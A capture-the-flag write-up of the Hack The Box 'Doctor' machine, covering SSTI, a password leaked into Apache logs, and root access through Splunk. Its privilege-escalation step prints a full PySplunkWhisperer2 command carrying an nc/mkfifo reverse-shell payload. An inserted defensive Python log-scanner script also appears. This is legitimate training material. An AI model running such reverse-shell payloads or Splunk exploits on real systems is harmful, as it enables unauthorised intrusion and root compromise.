cY83rR0H1t
May 22, 2022

Doctor - Hack The Box

Introduction

Doctor is an easy Linux machine on Hack The Box. For the user part, we exploit a Server-Side Template Injection (SSTI) and then look through log files to obtain a password. For the root part, we exploit Splunk.

Enumeration

The nmap scan found three open ports: 22, 80 and 8089.

Visiting port 80 reveals the domain doctors.htb.

We added doctors.htb to the /etc/hosts file.

Here we can see the login page.

We created an account to log in.

Exploit the SSTI

We can create a new post.

We tried a small SSTI payload to check whether the application is vulnerable.

In the source code, we can see that there is a directory called Archive.

Checking the archive directory, we can see that our SSTI payload was rendered, so the injection worked perfectly.

Now it's time to gain a reverse shell. We used a one-liner reverse shell payload.

We have got a reverse shell.

Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

Finding Password in Logs

After enumerating files and logs, we managed to find something interesting. In /var/log/apache2/backup, a password-reset request had been logged, and the value ‘Guitar123’ was visible in the email parameter.
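As an added defensive example (not part of this write-up), the following Python script scans Apache combined-format access log lines for the kind of leak described above: a credential submitted in the query string of a password-reset request, or a query parameter with a sensitive name. It assumes the reset request was logged with a GET query string, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" access-log line; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
EMAIL_RE = re.compile(r'^[^@\s]+@[^@\s]+\.[^@\s]+$')
SENSITIVE_NAMES = {'password', 'passwd', 'pass', 'pwd', 'token', 'secret'}
RESET_PATHS = ('/reset_password', '/forgot_password', '/reset')  # assumed endpoint names

def find_leaks(lines):
    """Return (ip, path, param) triples for requests whose logged query string
    likely contains a credential: a sensitive parameter name, or a non-email
    value submitted to a password-reset endpoint's email field."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        parts = urlsplit(m['target'])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name.lower() in SENSITIVE_NAMES:
                findings.append((m['ip'], parts.path, name))
            elif (parts.path in RESET_PATHS and name.lower() == 'email'
                  and value and not EMAIL_RE.match(value)):
                # A user typed something other than an address into the
                # email field of a reset form; it is often their password.
                findings.append((m['ip'], parts.path, name))
    return findings

# Constructed sample lines (not from the machine's real log).
SAMPLE_LOG = """\
10.10.14.5 - - [21/May/2022:10:00:01 +0000] "GET / HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.10.14.5 - - [21/May/2022:10:00:07 +0000] "GET /reset_password?email=shaun@doctors.htb HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [21/May/2022:10:00:09 +0000] "GET /reset_password?email=Guitar123 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.10.14.5 - - [21/May/2022:10:00:12 +0000] "POST /login?password=oops HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for ip, path, param in find_leaks(SAMPLE_LOG.splitlines()):
        print(f"possible credential in log: {ip} {path} param={param}")
```

Flagged lines are candidates for log redaction and for forcing a password rotation, since anyone who can read the backup log can read the value.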

We switched to the user shaun with that password and got the user flag.

Privilege Escalation

Running linpeas.sh reveals splunkforwarder in the /opt directory. Splunk is running as root on port 8089.

# Command
$ python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.59 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.59 443 >/tmp/f'

Reference: https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2

We got a root reverse shell.

Thanks for reading.
Hack The Box Profile: https://www.hackthebox.eu/profile/116842


MSc CyberSecurity | Cybersecurity researcher | OSCP | CRTO | CRTP | eCPPTv2 | eJPT | Hack The Box player | CTF player